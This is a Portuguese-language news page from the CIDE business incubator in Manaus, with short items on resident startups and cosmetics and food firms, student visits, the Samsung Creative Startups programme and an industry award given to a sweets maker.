• 92 3216-3892
  • secretaria@cide.org.br

Notícias

Tecnologia a favor das crianças

 

Equipe que desenvolveu o projeto.

Com o objetivo de fazer o lançamento de uma plataforma de jogos interativos para ajudar a crianças a lidar com a raiva e a agressividade, a startup (empresa iniciante com grande potencial tecnológico) Dream Kid apresentou a profissionais da tecnologia, psicólogos, empresários e convidados o FELT, jogo criado para facilitar a educação emocional das crianças com conflitos emocionais internos, que podem ser solucionados de maneira criativa e intuitiva.

A apresentação aconteceu no Instituto de Desenvolvimento e Informática da Amazônia (SIDIA), bairro Parque 10 de novembro, Manaus, e tem o apoio de vários profissionais e instituições, como o Centro de Incubação e Desenvolvimento Empresarial (CIDE). “Nós acreditamos que toda criança merece conhecer a si mesma, aprender sobre o que sente e como pode resolver conflitos internos. Para auxiliar nesta jornada, a criança é apresentada à tartaruga Tuco, um personagem com o qual descobrirá o que é a raiva, os efeitos, as causas e as soluções para lidar com esse sentimento.”, diz a empreendedora Bárbara Nicolau, acrescentando que o intuito dos participantes do projeto é ajudar a profissionais da área educacional e de psicologia infantil no esclarecimento de emoções. “Por meio das emoções vividas pela tartaruguinha, a criança imerge em um exercício, em uma atividade de educação emocional”, conta Bárbara.

A plataforma dispõe de diferentes planos e valores que variam de acordo com o público ou as necessidades da criança. Para mais informações acesse www.feltgame.com

Bárbara Nicolau apresenta os resultados do projeto da Dream Kid.

Bárbara Nicolau agradece o empenho da sua equipe no projeto.

Bárbara Nicolau e a consultora do CIDE, Elizabeth Araújo.

Bárbara Nicolau apresenta as embalagens do produto desenvolvido por ela e sua equipe.

 

Turma de Farmácia da UFAM complementa formação no CIDE

Estudantes de Farmácia visitam laboratório de análises, no CIDE.

Uma turma de estudantes iniciantes do curso de Farmácia, da Universidade Federal do Amazonas (Ufam) esteve visitando, em agosto, algumas empresas que atuam no segmento de Cosméticos, Exames Laborais, Fitoterápicos, para complementar a formação.

Acompanhados da professora Alcinira Farias, da disciplina de Introdução à prática farmacêutica, os alunos conheceram as instalações das empresas, conversaram com os empresários da área de Farmácia. “São estudantes que estão iniciando o curso e vimos a necessidade de mostrar para eles os locais de atuação de um profissional de Farmácia e a importância desse profissional na sociedade. Assim, eles vão conhecendo e vão entendo o que é ser um farmacêutico”, diz a professora.

Ainda segundo Alcinira, trata-se de um semestre inteiro de visitas para saber onde o farmacêutico pode atuar e para que os estudantes se sintam motivados. Toda semana estaremos visitando um laboratório, um hospital, uma farmácia de manipulação, enfim, diversos setores de Farmácia”, conta, acrescentando que antes da visita, eles têm aulas teóricas sobre o que eles vão visitar. “Como aqui se trata de uma incubadora de empresas, alguns já mostraram certa vontade de um dia ser um empreendedor na área de Farmácia. Mas, o que fazemos é mostrar que eles podem atuar em diversos setores”, conclui a docente.

A estudante de Farmácia do segundo período, Beatriz Cardosa, ficou animada e impressionada com o que viu. “A visita nos proporcionou um conhecimento melhor do ambiente de trabalho e de áreas de atuação do Farmacêutico. Isso me dá mais motivação para continuar estudando. Eu quero fazer pesquisas nessa área e aqui eu percebi que é possível”, diz a estudante, que vai ter que apresentar um relatório da visita, explicando o que eles viram e vão fazer um debate entre eles.

Estudantes de Farmácia nas instalações do CIDE.

Estudantes conversam com profissional da área de análises.

Técnicos da 3M conhecem ações no CIDE

Os técnicos da 3M e do SIDIA em uma empresa de doces.

Um grupo da multinacional 3M, que atua em setores diversificados, como Transporte, Saúde, Escritório, Indústria, entre outros, esteve no Centro de Incubação e Desenvolvimento Empresarial (CIDE), na última semana de agosto, para conhecer as iniciativas e os projetos desenvolvidos por empresas e Startups (empresas iniciantes com grande potencial), instaladas na própria incubadora e que podem ser selecionadas para futuros projetos e programas coordenados pela 3M.

Segundo a Líder da Incubadora de Projetos Internos, Renata Decourt, há empreendedores no CIDE que atendem ao perfil procurado pelos visitantes. “Fizemos uma visita, conhecemos as empresas, produtos e potenciais, e vamos avaliar tudo”, diz Decourt, que contou com o apoio de dois técnicos do Samsung Instituto de Desenvolvimento e Informática da Amazônia (SIDIA).

Durante a visita, os técnicos da 3M se reuniram com a equipe de administração do CIDE, para conhecer o processo de incubação, conheceram o espaço reservado para as Startups e em seguida visitaram as empresas para conversar com os proprietários. Conforme informações dos visitantes, outras incubadoras de Manaus foram visitadas também.

Sinais que o seu negócio está virando uma grande empresa

1. Você está investindo no desenvolvimento de seu pessoal

2. Você está focando a sua empresa em um nicho cada vez mais específico

3. Você está trabalhando na criação de parcerias de negócios

4. Você está preocupado em educar o seu mercado

fonte: www.agendor.com.br

Os técnicos conhecem a estrutura do CIDE.

Os visitantes conhecem o co-working do CIDE.

Os técnicos se reúnem com a administração do CIDE e um empreendedor.

Técnicos fazem degustação de produtos.

 

Empresários procuram parcerias com o CIDE

Empresários e a equipe de administração do CIDE em reunião

Empresários de diferentes níveis de negócios procuram o Centro de Incubação e Desenvolvimento Empresarial (CIDE) para estabelecer parcerias estratégicas que vão melhorar os meios de divulgação de seus produtos e, consequentemente, as vendas. É o que os especialistas chamam de ganha-ganha.

Na prática, é o caso da Grid Tecnologia, uma empresa posicionada no mercado de Tecnologia. “Hoje nosso nicho de mercado atende as empresas do Polo Industrial de Manaus (PIM), especificamente nas indústrias de manufatura, eletroeletrônico, com equipes que identificam a necessidade e demandas dos nossos clientes, automatizando processos, reestruturando equipamentos e processos para melhorar o processo produtivo”, diz o empresário Ailton Queiroz, que teve uma reunião com a equipe de administradores do CIDE.

A parceria entre empresas ou empresas e instituições não é um conceito novo, mas, na prática, são poucos os que estão dispostos a dar o primeiro passo. Porém, não é o caso da administradora de empresas, Giselane do Vale, que procurou o CIDE para ter informações detalhadas sobre como participar de programas direcionados a Startups (empresas que estão no início de suas atividades e que buscam explorar atividades inovadoras no mercado).

“Já havíamos ouvido falar do apoio do CIDE às empresas como incubadora. Então decidimos colocar nossa ideia em prática, procurando pessoas, consultores com experiência que nos possam auxiliar, orientar e indicar o melhor caminho para que o nosso sonho se torne realidade”, conta a empresária, acrescentando que possui uma empresa física, mas gostaria de entrar no segmento de empresas virtuais.

 

Empresárias com a consultora do CIDE, Elizabeth Araújo (à direita).

 

Turma de Presidente Figueiredo visita o CIDE

Estudates do Ifam de Presidente Figueiredo, no auditório do CIDE

O final do primeiro semestre e o começo do segundo proporcionam uma ótima oportunidade para que estudantes de escolas técnicas e universidades tenham contato com profissionais de atividades relacionadas com a área estudada por eles.

Um desses grupos acadêmicos é a turma de alunos de Empreendedorismo e Marketing do Instituto Federal de Educação do Amazonas (IFAM), de Presidente Figueiredo (município a 128 quilômetros de Manaus), que estiveram no Centro de Incubação e Desenvolvimento Empresarial (CIDE) para ouvir palestras e conhecer algumas empresas.

“A visita é muito importante para os alunos porque eles podem conhecer, ter uma relação entre academia e empresa privada, e conhecer a experiência de pessoas que já empreenderam e colocaram seus produtos inovadores no mercado. Tudo isso é válido para eles”, diz a professora Érica Gomes.

Ainda conforme a professora, a visita é uma forma de despertar o espírito empreendedor nos estudantes e motivá-los a seguir o caminho do empreendedorismo e conhecer instituições com as quais eles podem contar para concretizar suas ideias inovadoras. “São alunos do curso de Administração e das disciplinas de empreendedorismo, gestão de agronegócios e sistema integrado de gestão”, completa Érica.

Durante a visita os empresários manifestaram a escassez de matéria-prima local para doces e produtos de beleza. “Ao voltar à escola, faremos um relatório e vamos debater sobre essa necessidade manifestada pelos empreendedores. Isso abre uma oportunidade para os próprios alunos de Presidente Figueiredo, no que corresponde à matéria-prima. Talvez no futuro, por exemplo, vamos ter no mercado mais fornecedores de cupuaçu”, conclui.

Estudantes ouvem palestra sobre Empreendedorismo

Estudantes visitam fábrica de doces

Estudantes no auditório do CIDE

Estudantes conversam com empresários.

 

Empresa do CIDE alcança metas e lança produtos

Os sócios da Biozer Amazônia, em evento no Rio de Janeiro para lançamento de produtos.

A Biozer Amazônia, empresa de cosméticos e produtos naturais, instalada no Centro de Incubação e Desenvolvimento Empresarial (CIDE), conseguiu as devidas certificações emitidas pela Agência Nacional de Vigilância Sanitária (ANVISA), para fazer o lançamento dos seus produtos, informa o sócio-proprietário, Danniel Pinheiro.

A linha de cosméticos recebeu o nome de “Simbioze Amazônica” e, segundo a empresa, os produtos serão elaborados somente com ingredientes naturais e certificados. “O diferencial dos nossos produtos está no fato de que eles possuem uma rastreabilidade e segurança que permitem que o consumidor confie em um produto certificado pela ANVISA e cuja procedência é garantida”, diz o sócio Danniel Pinheiro.

Os produtos da linha “Simbioze Amazônica” já foram lançados no evento “Green Rio”, que aconteceu em junho, na cidade do Rio de Janeiro. “Tivemos a oportunidade de lançar nossos produtos no Rio de Janeiro, mas estamos preparando toda uma estrutura para que eles sejam comercializados em estabelecimentos de beleza em Manaus, como drogarias, clínicas de tratamentos estéticos”, comenta Danniel, lembrando que os interessados em obter mais informações e adquirir os produtos podem ligar para o número 3213-3207.

Os passos para cosméticos, higiene e perfumes

Segundo a página eletrônica (site) do Serviço Brasileiro de Apoio às Micro e Pequenas Empresas (SEBRAE), a legislação sanitária brasileira relacionada aos Produtos de Higiene, Cosméticos e Perfumes (HPPC) exige a autorização de funcionamento da empresa emitida pela Agência Nacional de Vigilância Sanitária (Anvisa). Somente esse órgão pode autorizar atividades como extrair, produzir, fabricar, transformar, sintetizar, embalar, reembalar, importar, exportar, armazenar, expedir, transportar e distribuir produtos enquadrados na categoria de Higiene Pessoal, Perfumaria e Cosméticos. O Sebrae tem auxiliado empreendedores que queiram se regularizar e abrir uma empresa de HPPC. No site do próprio SEBRAE, os interessados em abrir empresas de produtos de higiene podem acessar à cartilha completa.

Estande da Biozer Amazônia, no Rio de Janeiro.

Os proprietários da Biozer Amazônia no estande da empresa, no Rio de Janeiro.

 

Incubadora fomenta relações entre empresários em confraternização

 

O diretor executivo, José B. Grosso, faz a abertura da confraternização

Vários empresários instalados no Centro de Incubação e Desenvolvimento Empresarial (CIDE) fizeram uma parada nas suas atividades, no dia 29 de junho, para realizar uma confraternização e fomentar as relações empresariais entre as diferentes empresas.

O evento contou com a participação também de funcionários, equipe de administração do CIDE e convidados. “Há muitas empresas instaladas aqui e cada um fica no seu escritório. Mas, há um momento em que você precisa relaxar e conhecer quem é seu vizinho, seu colega empreendedor, as atividades que ele realiza… A vida não é somente trabalhar, é também diversão”, disse o gerente administrativo do laboratório CQ Lab, Fernando Tirolli.

Com comidas e bebidas típicas de arraial de mês de junho, muitos funcionários foram ao evento para experimentar por primeira vez os pratos, como foi o caso de alguns venezuelanos que trabalham nas empresas.

O diretor executivo do CIDE, José B. Grosso, abriu a confraternização agradecendo a participação de todos. “Esse momento é para relaxar e também para fortalecer as relações entre todos nós. Espero que nesse ambiente de amizade surjam novas ideias e projetos”, concluiu.

Equipe administrativa do CIDE e convidados.

Convidados experimentam comidas típicas.

Funcionárias do CQ Lab, empresa instalada no CIDE.

O empresário Gustavo Godoy, proprietário da Trembão

O empresário Danniel Pinheiro, da Biozer

 

Estudantes do IFAM visitam o CIDE para complementar a formação de empreendedorismo

Estudantes e a equipe administrativa do CIDE

Mais de 30 jovens estudantes do curso de Informática, da disciplina Empreendedorismo e Cooperativismo, do Instituto Federal do Amazonas (Ifam), estiveram no Centro de Incubação e Desenvolvimento Empresarial (CIDE) para complementar a formação, visitando as empresas instaladas e conversando com os empreendedores instalados no local.

A visitação começou pelo auditório da instituição, onde eles escutaram várias palestras sobre processos de incubação, empreendedorismo na área de Tecnologia e apresentaram ideias desenvolvidas ao longo do curso. “Durante as aulas, surgem ideias e propostas dos próprios estudantes. São ideias viáveis. Portanto, decidimos trazê-los aqui para que eles conheçam o ambiente de uma incubadora de empresas e que no futuro façam parcerias com o CIDE”, conta o professor Eltton Carneiro.

Ainda segundo o professor, atualmente, muitos alunos mudaram de ideia respeito à sua formação acadêmica e ao seu futuro. “Antes, a visão de empreendedorismo dos estudantes era quase zero. Agora, o que nós percebemos é que muitos estudantes querem empreender, querem colocar em prática a sua ideia”, diz Eltton, acrescentando que o Ifam mantém parcerias que ajudam os alunos no desenvolvimento de suas ideias. “Não é fácil empreender no Brasil, mas, detrás de cada empreendedor, há fé, persistência, sacrifícios, formação, parcerias e muito amor”, conclui o docente.

Empresário e empreendedor

Isabelle Lima foi uma das estudantes que participou da visita e tirou dúvidas durante as palestras. “Para mim, a parte mais importante foi quando eu aprendi que um negócio funciona melhor com parcerias porque sozinho é mais difícil. Temos que fazer planejamentos, ter metas para que o negócio possa evoluir e dar frutos”, conta, dizendo também que conseguiu compreender uma grande dúvida que ela tinha. “Eu aprendi também que ser empreendedor não significa ser empresário. Nós temos que saber administrar o próprio negócio”, finaliza.

Estudantes do Ifam entram nas instalações do CIDE

A primeira parada dos estudantes foi no auditório do CIDE

O diretor executivo do CIDE, José Grosso, fala com os estudantes

Professores do Ifam fazem perguntas sobre o processo de incubação

Palestrante fala para os estudantes do Ifam

Estudante do Ifam apresenta projeto

Estudantes e professores do Ifam no auditório do CIDE

Estudantes visitam empresa de doces

 

Parcerias rendem novos negócios para empresas

Gustavo Godoy fala para a televisão sobre os seus produtos.

Para oferecer novos produtos e serviços, e captar novos clientes, empresas instaladas no Centro de Incubação e Desenvolvimento Empresarial (CIDE), fazem novas parcerias com empresas de outros segmentos, mas que estão relacionadas de alguma forma com produtos comercializados por ambos.

Um desses produtos é o rico cardápio oferecido pela Trembão, empresa de alimentos fitness, em parceria com clínicas de estética de Manaus. “Eu creio que muita gente já ouviu falar do Detox, mas o que nós ferecemos é uma linha de produtos que consiste na consumição, durante sete dias de alimentação, do chá Detox, o almoço Detox, lanche Detox e jantar Detox que vai ajudar a desintoxicar o organismo das comidas industrializadas e ajuda no emagrecimento”, diz o pós-graduado em Segurança Alimentar e Comida Saudável Gustavo Godoy.

Godoy não revela a receita dos produtos Detox, mas conta que alguns fisioterapêutas incluíram o cardápio da Trembão nos pacotes de produtos das clínicas. “Hoje o detox não é uma novidade, mas não posso passar a receita porque é o segredo do negócio e passei muito tempo para elaborar esse cardápio. Mas quero destacar que é um dos produtos mais consumidos”, diz.

 

Público feminino

De acordo com o empresário da Trembão, o cardápio detox é mais consumido pelas mulheres que procuram qualidade de vida. “Pessoas que têm problemas de prisão de ventre, que querem enmagrecer, costumam consumir nossos produtos. É muito raro que os homens procurem esses tipos de produtos”, conta Godoy, acrescentando que o público feminino a partir dos 25 anos de idade já consome o cardápio.

Além de atender as demandas das novas parcerias com as clínicas, a Trembão mantém a qualidade de seus produtos. “O nosso objetivo é o mesmo: satisfazer o cliente em qualidade de alimentação. Os próprios consumidores ou clientes entram em contato com a gente para elogiar, agradecer… Isso é um resultado positivo para nós porque o cliente está feliz”, diz.

 

Dieta detox

O principal foco da dieta detox é aumentar o consumo de alimentos orgânicos e pobres em gordura, e evitar os produtos industrializados, que são ricos em sal, gordura e aditivos químicos. Na dieta líquida detox apenas é permitido ingerir líquidos como chá, água, sucos de frutas ou de legumes, e sopas de legumes, sendo importante utilizar sempre produtos orgânicos.

Produtos da Trembão comercializados pelas clínicas de estética.

Gustavo Godoy recebe visita de estudantes do curso de Nutrição.

 

Videoconferência ajuda formação no CIDE

Administradoras do CIDE e participantes das palestras reunidos para a videoconferência.

Os jovens empreendedores aprovados no Programa Creative Startups, resultado de uma parceria entre Samsung e Associação Nacional de Entidades Promotoras de Empreendimentos Inovadores (Anprotec) estão recebendo, via videoconferência, capacitações relacionadas com a área escolhida por eles para que possam desenvolver com êxito seus empreendimentos. Os encontros acontecem no Centro de Incubação e Desenvolvimento Empresarial (CIDE) que é parceiro da Anprotec nesse projeto.

Segundo a consultora do CIDE, Elizabeth Araújo, que acompanha os jovens nesse processo, a temática das videoconferências obedece uma série de requisitos que estão de acordo com as atividades das startups. “Validação de produtos, Captação de Clientes, Patentes, são alguns dos assuntos abordados nas palestras e formações”, diz a consultora, acrescentando que dez incubadoras do Brasil participam do projeto.

Ainda segundo Elizabeth Araújo, durante as sessões de videoconferências os assuntos, as dúvidas são compartilhados entre os participantes. “Em Manaus, dez jovens participam desse projeto e duas incubadoras de empresas também. Além disso, há algumas formações em que o empresariado das próprias incubadoras podem participar”, diz.

No contexto desse projeto, uma equipe de analistas em Processamento de Dados esteve no CIDE para conhecer e avaliar as instalações. O resultado da visita foi positivo e eles constataram que o espaço empresarial para startups é adequado e atende às necessidades do Programa Creative Startups.

Objetivo

O objetivo da videoconferência é colocar em contato, através de um sistema de vídeo e áudio, duas ou mais pessoas separadas geograficamente.

Durante a sessão de videoconferência, dúvidas são compartilhadas entre todos.

 

CIDE: 18 anos de desenvolvimento empreendedor.

Empresários, equipe administrativa do CIDE e convidados, nos 18 anos da instituição.

Com a finalidade de comemorar os 18 anos do Centro de Incubação e Desenvolvimento Empresarial (CIDE), o diretor executivo, José Barbosa Grosso, e a equipe administrativa da instituição, reuniram no último 18 de maio, na própria incubadora, os empresários e os funcionários das empresas instaladas no centro, para um momento de confraternização e agradecimentos.

Na ocasião, o diretor fez uma avaliação dos trabalhos desenvolvidos ao longo desses anos e agradeceu as parcerias. “Somos como uma família e sozinho é muito difícil realizar as coisas. Espero que essa boa relação continue sempre porque precisamos um dos outros”, disse o diretor executivo, José B. Grosso, acrescentando que incubadora “já é de maior”.

Além de funcionários e empresários atualmente instalados, a comemoração atraiu a alguns empresários que passaram pela incubadora e concluíram seu processo empresarial, como o gerente da Waku Sese, que agradeceu pelos anos que a empresa ficou instalada no CIDE.

Depois dos agradecimentos, um lanche foi servido com os próprios produtos produzidos pelas empresas da área de Alimentação, instaladas na incubadora.

HISTÓRICO

Lançamento da pedra fundamental: 20 de maio de 1999

Aprovação do estatuto: 20 de outubro de 1999

Criação do CIDE 10 de novembro de 1999

Constituição do Conselho Administrativo: 27 de janeiro de 2000

Inauguração do CIDE: 19 de maio de 2000

 

O diretor executivo, José B. Grosso (centro), conversa com empresários antes dos parabéns.

O diretor executivo, José B. Grosso, faz os agradecimentos.

A equipe administrativa do CIDE agradece pelos objetivos alcançados.

 

Uma “noite doce” para empresária instalada no CIDE

A empresária Jane Barros e o diretor executivo do CIDE, José B. Grosso.

A empresária Jane Socorro Barros Ferreira, proprietária da Amazon Comércio de Doces Ltda, empresa instalada no Centro de Incubação e Desenvolvimento Empresarial (CIDE), recebeu, na noite de quinta-feira, 17 de maio, o diploma de Microindustrial Destaque do Ano, prêmio concedido pela Federação das Indústrias do Estado do Amazonas (FIEAM), pela sua trajetória empreendedora.

A história empresarial da proprietária permitiu que ela estivesse entre os melhores do ano. “Nada foi fácil. Tinha no quintal de casa plantações de cupuaçu e maracujá, comecei a me aventurar na produção de doces e nunca mais parei”, diz Jane Barros.

Ao longo dos anos no CIDE, a Amazon Doces conquistou novos espaços, instalando pontos de vendas em shoppings da cidade, feiras e lugares de eventos. “Fomos conquistando novos espaços apesar das dificuldades que enfrentamos todos os dias”, conta a premiada.

Para o diretor executivo do CIDE, José B. Grosso, a escolha é um importante reconhecimento aos que lutam e triunfam. “O potencial do nosso empresariado é muito forte, mas eles precisam de apoios, de capacitações, de estrutura. E um dos objetivos da nossa incubadora é identificar as necessidades empresariais e ajudar os empreendedores que nos procuram”, conclui o diretor.

Além de Jane Barros, foram homenageados o empresário Claudio Antonio Barrella, da empresa Tutiplast Indústria e Comércio Ltda, e a empresa Recofarma Indústria do Amazonas Ltda, como empresa exportadora do ano.

A homenageada Jane Barros e o presidente da FIEAM, Antonio Silva.

A empreendedora Jane Barros com familiares e seus convidados.

Os três homenageados da noite com o presidente da FIEAM.

Jane Barros recebe das mãos do presidente do CIEAM, Wilson Périco (à esq.), a placa.

Jane Barros faz um discurso para empresários e convidados sobre a sua trajetória.

 

“Espaço Startups” do CIDE está entre os melhores

A equipe técnica do CIDE mostra as instalações aos técnicos da Samsung

 

Uma visita técnica, realizada na última semana do mês de março, no Centro de Incubação e Desenvolvimento Empresarial (CIDE), por representantes do Programa Creative Startup, patrocinado pela Samsung, em parceria com a Associação Nacional de Entidades Promotoras de Empreendimentos Inovadores (Anprotec), confirmou que a incubadora de empresas supera todas as expectativas exigidas para a ocupação de novos empreendimentos inovadores.

Acompanhados pelo diretor executivo, José B. Grosso, e a equipe técnica da instituição, analistas e especialistas em Processamento de Dados (P&D) “inspecionaram” as instalações reservadas às startups ((negócios inovadores que estão começando). “Viemos conhecer o espaço da incubadora CIDE pessoalmente, o que ela pode oferecer às startups, já que é a primeira vez que a instituição participa do programa”, diz o chefe de P&D, Carlos Matos.

Segundo os técnicos, o centro empresarial possui um espaço adequado com salas para reuniões, auditório, espaços compartilhados (coworking), estacionamento, segurança. “Então, as próximas empresas que venham aqui, estarão bem atendidas”, dizem os especialistas.

Durante a visita ao CIDE, os técnicos lembraram que no mês de maio acontecerá uma nova seleção de startups por meio do programa Creative Startup que podem vir a ocupar a estrutura da incubadora de empresas. “Embora algumas startups decidam estar somente associadas a este centro empresarial, elas poderão usufruir das instalações do mesmo, como sala de reuniões, auditório, etc.”, contou a especialista em P&D, Alessandra Duarte, acrescentando que no momento, no Norte, somente duas incubadoras participam do programa, a do CIDE e a da Universidade Estadual do Amazonas (InUEA).

 

O Programa

O Programa Creative Startups é resultado de uma parceria firmada em 2015 entre a Samsung, a Anprotec e o Centro Coreano de Economia Criativa e Inovação (CCEI), e tem como objetivo identificar, selecionar e oferecer suporte a empreendimentos inovadores em áreas de interesse da Samsung.

Representantes da Samsung conhecem o coworking do CIDE.

FIEAM anuncia agraciados do prêmio “Industrial do Ano”

A empresária, Jane Barros (esq.), recebe certificado de curso, no CIDE.

A empreendedora Jane do Socorro Barros Ferreira, proprietária da Amazon Comércio de Doces Ltda, conhecida como “Amazon Doces”, empresa instalada no Centro de Incubação e Desenvolvimento Empresarial (CIDE), é a mais nova microempresária do ano, escolhida pela Federação das Indústrias do Estado do Amazonas (FIEAM).

A solenidade da entrega dos prêmios acontecerá em maio, no Clube do Trabalhador do SESI, em Manaus, e conta com o apoio do Centro da Indústria do Estado do Amazonas (CIEAM).

A Amazon Doces atende à demanda de doces caseiros regionais, com o uso de frutas como araçá-boi, cupuaçu, açaí, buriti, castanha e muitos outros, e participa em feiras locais e nacionais, possui pontos de vendas nos principais shoppings de Manaus, gerando emprego e desenvolvimento ao Estado do Amazonas.

O outro agraciado é o empresário Cláudio Antônio Barrella, sócio diretor da Tutiplast Indústria e Comércio Ltda, na categoria microindustrial do ano. Fornecedora de soluções em injeção plástica há mais de 20 anos no Polo Industrial de Manaus (PIM), a Tutiplast tem mais de 650 produtos que atendem os segmentos de eletroeletrônico, mecânico, duas rodas, entretenimentos, higiene pessoal, relojoeira informática e produtos descartáveis.

A empreendedora Jane Barros.

Jane Barros recebe universitários na Amazon Doces.

Jane Barros apresenta a Amazon Doces para investidores belgas, no CIDE.

 

Empresas do CIDE em espaço de feira do Sebrae

O estande da Amazon Doces comercializou, além dos biscoitos, o ovo de Páscoa regional.

 

Empresas do setor da panificação, doces e cosméticos, instaladas no Centro de Incubação e Desenvolvimento Empresarial (CIDE), participaram do “6º Empório Sebrae Agronegócios”, no mês de março, para divulgar e comercializar seus produtos, e fazer novas parcerias de negócios, no pátio externo do Serviço Brasileiro de Apoio à Pequena e Média Empresa (Sebrae), no Centro de Manaus.

Devido à aproximação com a Semana Santa, o evento contou também com as presenças dos empreendedores do setor de pescados, verduras, hortaliças, laticínios, molhos e outros. Para o diretor executivo do CIDE, José B. Grosso, o evento Empório Sebrae gera novos negócios. “Essa iniciativa é o início para a captação de novos clientes, geração de novas parcerias e novos empregos. Vai além da exposição ou divulgação de produtos”, diz José Grosso.

Nessa edição, o Empório Sebrae ofereceu a possibilidade de degustar os produtos. “Todas as empresas recebem o apoio do Sebrae Amazonas por meio de programas setoriais que auxiliam no desenvolvimento de micro e pequenos negócios no Estado e o consumidor ganha a chance de comprar ingredientes frescos e por preços mais em conta, diretamente de quem produziu”, diz o analista técnico do Sebrae no Amazonas e organizador do evento, Leocy Cutrim.

Representantes da Sabores de Tradição na feira do Sebrae.

Consultoras de cosméticos da Amhy, empresa instalada no CIDE.

 

CIDE reserva espaço para Startups inovadoras

Espaço possui estacionamento, salas, banheiros e segurança

 

O Centro de Incubação e Desenvolvimento Empresarial (CIDE) reservou e preparou um espaço de 240 metros quadrados, conhecido como coworking (compartilhar o mesmo espaço de trabalho), para receber novas startups (negócios que estão começando). As três primeiras empresas a inaugurar o local já foram escolhidas por meio do programa Creative Startups, da Samsung, em parceria com a Associação Nacional de Entidades Promotoras de Empreendimentos Inovadores (Anprotec), executora do programa.

Para saber mais sobre o projeto da multinacional, uma equipe do CIDE participou, no mês de fevereiro, do BootCamp, em São Paulo, evento que marca o início do processo de aceleração de startups selecionadas. “Nós vamos receber nesse momento três empresas escolhidas no Amazonas que vão ficar instaladas no nosso coworking. Durante nove meses esses jovens empreendedores serão monitorados pelo CIDE e receberão assistência contábil e jurídica, e um relatório vai ser entregue à Anprotec”, diz o diretor executivo do CIDE, José Grosso, que esteve no evento, juntamente com a consultora Elizabeth Araújo e alguns jovens que participam do programa.

O Programa

O Programa Creative Startups é resultado de uma parceria firmada em 2015 entre a Samsung, a Anprotec e o Centro Coreano de Economia Criativa e Inovação (CCEI), e tem como objetivo identificar, selecionar e oferecer suporte a empreendimentos inovadores em áreas de interesse da Samsung. “Nossa ida a São Paulo nos proporciona mais conhecimentos sobre o programa e nos ajuda a definir nosso papel no desenvolvimento de projetos inovadores”, diz o diretor executivo, recordando que houve ótima interação com os participantes e com outras incubadoras de empresas do Brasil.

A iniciativa tem o apoio do Ministério da Ciência, Tecnologia, Inovações e Comunicação (MCTIC) amparado pela Lei de Informática. “A startup melhor classificada de todos os projetos irá à Coreia do Sul para apresentar o seu projeto”, conclui José B. Grosso.

São 240 metros quadrados. O espaço é conhecido como coworking (compartilhar o mesmo espaço de trabalho).

Representantes do CIDE e os jovens associados da incubadora no evento da Samsung.

Durante o evento da Samsung, um vídeo institucional do CIDE foi exibido aos participantes.

Os jovens associados do CIDE, Marcos Farias e Wesley Monteiro, participam das atividades.

 

Empreendedores de inteligência artificial

O diretor executivo do CIDE, José Grosso, verifica a documentação dos novos associados.

 

Jovens estudantes de Ciência da Computação, Marcos Paulo Farias, Wesley Monteiro e João Paulo Fontenelle, desenvolveram um sistema de “bate-papo”, conhecido também como “chat”, para auxiliar os consumidores a tomar decisão na hora de realizar compras pela Internet. Eles são os novos associados do Centro de Incubação e Desenvolvimento Empresarial (CIDE)e pretendem fazer o lançamento experimental no mês de julho.

Segundo os estudantes, o diálogo ou “bate-papo” acontece entre a pessoa interessada em adquirir um produto e a máquina, uma espécie de robô. “Nós percebemos que muitas empresas estão adotando cada vez mais a inteligência artificial no seu processo comercial. Então decidimos criar um sistema que permite ao usuário escolher um produto de acordo com as suas necessidades, mostrando a ele os locais onde pode encontrar o que está buscando, comparar preços, como pagar, gastos de fretes, etc. O nosso foco é desde o conhecimento do produto até o fechamento da compra”, destacam os jovens empreendedores.

Para eles o CIDE joga um papel importante no desenvolvimento do projeto porque por meio da incubadora de empresas, os jovens terão uma relação mais forte com outras empresas. “Os contatos que tem o CIDE podem facilitar a divulgação e a venda do nosso produto. Queremos ampliar nosso network e pensamos que essa instituição pode nos ajudar”, diz Marcos Farias.

A inteligência artificial (IA) é um ramo da ciência da computação que se propõe a elaborar dispositivos que simulem a capacidade humana de raciocinar, perceber, tomar decisões e resolver problemas, enfim, a capacidade de ser inteligente.

Jovem empreendedor assina contrato no CIDE.

No CIDE, jovens empreendedores vão ter uma relação mais forte com outras empresas.

Para os jovens, os contatos que tem o CIDE facilitará a divulgação.

 

 

 

Farmacêutica tem sua própria linha de produtos

A farmacêutica, Larhicy de Souza (à dir.), trabalha em equipe.

 

Ela nasceu no Maranhão, estudou Farmácia em São Paulo, trabalhou em Manaus e hoje é uma das novas empreendedoras, instaladas no Centro de Incubação e Desenvolvimento Empresarial (CIDE), onde possui a empresa de cosméticos Amhy, realizando um sonho de estudante que era ter seu próprio negócio e gerar emprego.

“Quando eu cheguei a Manaus, eu trabalhei em duas grandes empresas de produtos farmacêuticos, mas eu sempre tinha aquela inquietude de produzir meus próprios cosméticos. Eu ganhava bem, mas sentia que faltava alguma coisa. Eu queria ter o prazer de ter a minha própria linha de produtos”, relata a proprietária da Amhy, Larhicy de Souza.

Ainda segundo Larhicy, o pai dela era um exemplo que ela queria seguir, já que ele também é um empreendedor. “Eu gosto de arriscar, de inovar, de tentar algo diferente. E, durante umas férias, eu decidi produzir meus primeiros produtos em casa para testar. Minha mãe desocupou um quarto de hóspede e eu comecei”, conta a empresária.

O primeiros passos deram tão certo que ela começou a divulgar os primeiros resultados. “Meus pais foram os primeiros a provar os produtos. Depois, eu divulguei para minhas colegas de trabalho e o negócio foi florescendo e eu comecei a fabricar produtos com essências da Amazônia”, diz Larhicy.

A farmacêutica acreditava tanto no seu potencial empreendedor que decidiu abandonar o emprego e buscou incubadoras de empresas. No começo, ela se instalou em uma incubadora universitária, mas o espaço foi ficando pequeno para o seu enorme sonho. “Eu não queria fabricar de maneira artesanal, eu queria que meus produtos tivessem certificações importantes e produzir em grande escala. Então eu procurei o apoio do CIDE, onde a estrutura é ampla e posso conseguir novas certificações, e realizar novos contatos”, diz a proprietária, lembrando que o começo não foi fácil.

A empresa de cosméticos de Larhicy começou bem no CIDE, nas primeiras semanas de instalação, ela teve a oportunidade de expor seus produtos para uma comitiva da Bélgica que visitou a incubadora para realizar novas parcerias. “Há momentos em que você tem vontade de desistir, mas você tem que persistir e não ter medo de errar”, finaliza ela.

Hoje, a Amhy possui 16 linhas de produtos, formadas por hidratantes, sabonetes, cremes para mãos e facial, difusores de ambientes e tantos outros.

 

Larhicy conta com duas colaboradoras.

 

A farmacêutica conversa com o embaixador belga em visita ao CIDE.

 

Larhicy procurou o apoio do CIDE.

“Super dindin” nas atividades físicas

Gustavo Godoy e os produtos da Trembão.

 

